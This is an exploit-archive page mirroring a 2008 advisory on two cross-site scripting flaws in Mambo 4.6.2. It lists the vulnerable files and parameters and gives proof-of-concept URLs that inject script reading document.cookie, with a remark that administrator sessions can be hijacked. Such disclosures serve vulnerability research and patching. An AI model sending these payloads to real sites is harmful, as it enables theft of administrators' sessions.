Advertisement






Mambo 4.6.2 Full Version - Multiple Cross Site Scripting

CVE Category Price Severity
N/A CWE-79 N/A High
Author Risk Exploitation Type Date
Exploit Alert Team High Remote 2008-08-19
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 0.8167 0.93399

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2008080048

Below is a copy:

 ----------------------------------------------------------------

Script : Mambo 4.6.2 Full & Older Versions

Type : Multiple Cross Site Scripting Vulnerabilities

Alert Level : Medium

----------------------------------------------------------------

Download From : http://surfnet.dl.sourceforge.net/sourceforge/mambo/MamboV4.6.2.zip

----------------------------------------------------------------

Discovered by : Khashayar Fereidani

My Website : http://FEREIDANI.IR

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Cross Site Scripting Vulnerability 1 :

Vulnerable File : administrator/popups/index3pop.php

Vulnerable Line (5)  : <title><?php echo $mosConfig_sitename; ?> - Administration [Mambo]</title>

Vulnerable Variable : mosConfig_sitename

For Example : http://Example/administrator/popups/index3pop.php?mosConfig_sitename=</title><script>alert(document.cookie)</script>

Attacker can hijack administrator cookie and session and login with they 

----------------------------------------------------------------

Cross Site Scripting Vulnerability 2 :

Vulnerable File : mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?

Vulnable Variable : Any Variable - You can set any variable ....

For Example set (hacker) variable : http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?khashayar=<script>alert('xss')</script>

you can set cross site scripting code in variable name : http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?<script>alert('xss')</script>=Hello+Word

----------------------------------------------------------------

                        Tnx : God

       http://IRCRASH.COM       http://FEREIDANI.IR

----------------------------------------------------------------


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.